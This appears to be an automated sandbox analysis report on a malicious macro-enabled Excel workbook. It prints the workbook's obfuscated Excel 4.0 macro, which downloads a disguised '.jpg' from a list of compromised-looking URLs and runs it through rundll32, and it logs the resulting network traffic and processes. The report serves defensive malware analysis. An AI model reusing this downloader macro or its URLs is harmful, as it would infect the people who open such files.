                                                                                                                                                  SSDEEP:768:sMfl6aGcGyspgPGw5S6f6TfW+u7DhcJkhoZd:Dfl60vspgPGw5jDfJAeU
                                                                                                                                                  File Content Preview:PK..........!.................[Content_Types].xml ...(......................................................................................................................................................................................................"".

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74ecd0e2f696908c

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Calculation-380472272-01262021.xlsm"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  ,,,,,,,,,,,,=B154(),"=FORMULA.FILL(kOTI!U54&kOTI!U55&kOTI!U56&kOTI!U57&kOTI!U58&kOTI!U59,BB53)","=FORMULA.FILL(kOTI!AC56,HI18807)","=EXEC(""r""&kOTI!AC60&"" ""&kOTI!AC59&"",D""&kOTI!AC61)",=B156(),=C156(),=HALT()"=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)","=FORMULA.FILL(kOTI!V53&kOTI!V54&kOTI!V55&kOTI!V56&kOTI!V57&kOTI!V58&kOTI!V59&kOTI!V60&kOTI!V61&kOTI!V62&kOTI!V63&kOTI!V64&kOTI!V65&kOTI!V66&kOTI!V67&kOTI!V68&kOTI!V69&kOTI!V70,HZ48004)","=FORMULA.FILL(kOTI!AC57,AN32726)","=Vuolasd(GT17028,AQ4875,1)",=B158(),=C158(),,"=FORMULA.FILL(kOTI!U62&kOTI!U63&kOTI!U64&kOTI!U65&kOTI!U66&kOTI!U67,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)",,=B160(),=C160(),,"=FORMULA.FILL(kOTI!AC58&B169,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)",=B162(),=C162(),"=Niokaser(0,GT17028,AQ4875,0,0)","=FORMULA.FILL(kOTI!AC59,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(kOTI!AC60,AS41071)",=A161(),=GOTO(D154),=B165(),,,"=FORMULA.FILL(kOTI!AC61,HG9961)",,,=C154(),,,,,,,,,"=INDEX(C172:C178,RANDBETWEEN(1,8))&B170",,,"=RANDBETWEEN(2222222,8888888)&"".jpg""",,,,,,,elisalopezphotography.com/ouahvdofd/,,,seat.nucleus.studio/ooono/,,,ssms.dsscwtl.in/sngenfnr/,,,jeffspoolservices.com/amghvhgpomyf/,,,karantani.com/ehxxysf/,,,craftmarketing.ca/mbkgreyilv/,,,fadingmemoriespodcast.com/bdxduufm/,

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 26, 2021 21:07:39.591067076 CET4973880192.168.2.435.208.103.169
                                                                                                                                                  Jan 26, 2021 21:07:39.722954988 CET804973835.208.103.169192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:39.723054886 CET4973880192.168.2.435.208.103.169
                                                                                                                                                  Jan 26, 2021 21:07:39.723671913 CET4973880192.168.2.435.208.103.169
                                                                                                                                                  Jan 26, 2021 21:07:39.856257915 CET804973835.208.103.169192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:40.185846090 CET804973835.208.103.169192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:40.185982943 CET4973880192.168.2.435.208.103.169
                                                                                                                                                  Jan 26, 2021 21:08:33.839188099 CET804973835.208.103.169192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:08:33.839277029 CET4973880192.168.2.435.208.103.169
                                                                                                                                                  Jan 26, 2021 21:09:26.066401005 CET4973880192.168.2.435.208.103.169
                                                                                                                                                  Jan 26, 2021 21:09:26.198256016 CET804973835.208.103.169192.168.2.4

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jan 26, 2021 21:07:26.644051075 CET6315353192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:26.661516905 CET53631538.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:28.203825951 CET5299153192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:28.219094992 CET53529918.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:29.366636038 CET5370053192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:29.385118961 CET53537008.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:32.003015995 CET5172653192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:32.018346071 CET53517268.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:34.893126011 CET5679453192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:34.908853054 CET53567948.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:36.108736038 CET5653453192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:36.150942087 CET53565348.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:36.452457905 CET5662753192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:36.486927986 CET53566278.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:37.441667080 CET5662753192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:37.457371950 CET53566278.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:38.508239985 CET5662753192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:38.526115894 CET53566278.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:39.572707891 CET5662153192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:39.589065075 CET53566218.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:39.695091963 CET6311653192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:39.711934090 CET53631168.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:40.496078014 CET6407853192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:40.511107922 CET53640788.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:40.519510984 CET5662753192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:40.535275936 CET53566278.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:41.844501019 CET6480153192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:41.861145020 CET53648018.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:42.907229900 CET6172153192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:42.924976110 CET53617218.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:44.521141052 CET5662753192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:44.536962032 CET53566278.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:44.656716108 CET5125553192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:44.671696901 CET53512558.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:46.091464996 CET6152253192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:46.106460094 CET53615228.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:50.707387924 CET5233753192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:50.722913980 CET53523378.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:07:55.633033037 CET5504653192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:07:55.649842978 CET53550468.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:08:32.392095089 CET4961253192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:08:32.409643888 CET53496128.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:08:50.124578953 CET4928553192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:08:50.139627934 CET53492858.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:09:26.807430029 CET5060153192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:09:26.824541092 CET53506018.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:09:48.982903957 CET6087553192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:09:48.998481035 CET53608758.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:12:11.004045010 CET5644853192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:12:11.019321918 CET53564488.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:12:11.508811951 CET5917253192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:12:11.539889097 CET53591728.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:12:14.234078884 CET6242053192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:12:14.249946117 CET53624208.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:12:17.219562054 CET6057953192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:12:17.252382994 CET53605798.8.8.8192.168.2.4
                                                                                                                                                  Jan 26, 2021 21:12:17.445108891 CET5018353192.168.2.48.8.8.8
                                                                                                                                                  Jan 26, 2021 21:12:17.462589025 CET53501838.8.8.8192.168.2.4

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jan 26, 2021 21:07:39.572707891 CET192.168.2.48.8.8.80xe2eeStandard query (0)fadingmemoriespodcast.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jan 26, 2021 21:07:39.589065075 CET8.8.8.8192.168.2.40xe2eeNo error (0)fadingmemoriespodcast.com35.208.103.169A (IP address)IN (0x0001)
                                                                                                                                                  Jan 26, 2021 21:12:11.019321918 CET8.8.8.8192.168.2.40x5c7fNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • fadingmemoriespodcast.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.44973835.208.103.16980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jan 26, 2021 21:07:39.723671913 CET110OUTGET /bdxduufm/5319402.jpg HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: fadingmemoriespodcast.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jan 26, 2021 21:07:40.185846090 CET118INHTTP/1.1 200 OK
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Tue, 26 Jan 2021 20:07:33 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  X-Httpd: 1
                                                                                                                                                  Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                                                                                                  X-Proxy-Cache: MISS
                                                                                                                                                  X-Proxy-Cache-Info: W NC:000000 UP:
                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                  Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 140


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:21:07:33
                                                                                                                                                  Start date:26/01/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                  Imagebase:0x1130000
                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:21:07:39
                                                                                                                                                  Start date:26/01/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer
                                                                                                                                                  Imagebase:0x100000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >